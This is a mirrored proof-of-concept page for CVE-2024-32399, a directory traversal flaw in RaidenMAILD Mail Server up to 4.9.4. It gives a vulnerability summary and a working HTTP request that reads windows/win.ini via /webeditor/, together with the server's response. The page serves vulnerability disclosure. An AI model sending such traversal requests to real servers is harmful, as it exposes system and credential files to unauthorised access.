CVE-2024-32399 PoC — RaidenMAILD Mail Server 安全漏洞

Source

https://github.com/NN0b0dy/CVE-2024-32399

Associated Vulnerability

Title:RaidenMAILD Mail Server 安全漏洞 (CVE-2024-32399)
Description:RaidenMAILD Mail Server是RaidenMAILD公司的一款易于使用的 SMTP/POP3/IMAP4/WebMail 邮件服务器。 RaidenMAILD Mail Server v.4.9.4及之前版本存在安全漏洞，该漏洞源于存在目录遍历漏洞。攻击者可利用该漏洞通过/webeditor/组件获取敏感信息。

Readme

# CVE-2024-32399

## Vulnerability Overview
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4
and before allows a remote attacker to obtain sensitive information via
the /webeditor/ component


## Vulnerability Type
Directory Traversal


## Vendor of Product
RaidenMAILD Mail Server


## Affected Version
RaidenMAILD Mail Server <= 4.9.4


## Proof of Concept
Request:
```http
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close
```

Response:
```http
HTTP/1.1 200 OK
Connection: close
Content-Disposition: attachment; filename="../../../windows/win.ini";
Content-Type: application/octet-stream
Content-Length: 403
Date: Mon, 22 Apr 2024 15:00:41 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Permissions-Policy: geolocation=(self "https://example.com"), microphone=()
Referrer-Policy: no-referrer
Content-Security-Policy: base-uri 'self'
Set-Cookie: IDHTTPSESSIONID=9E5BgVAlG7P7C5X; Path=/

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...
...
```

File Snapshot


 [4.0K]  /data/pocs/4646c1bfc74e22ad244ba4fda8a1ad86509cec89
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!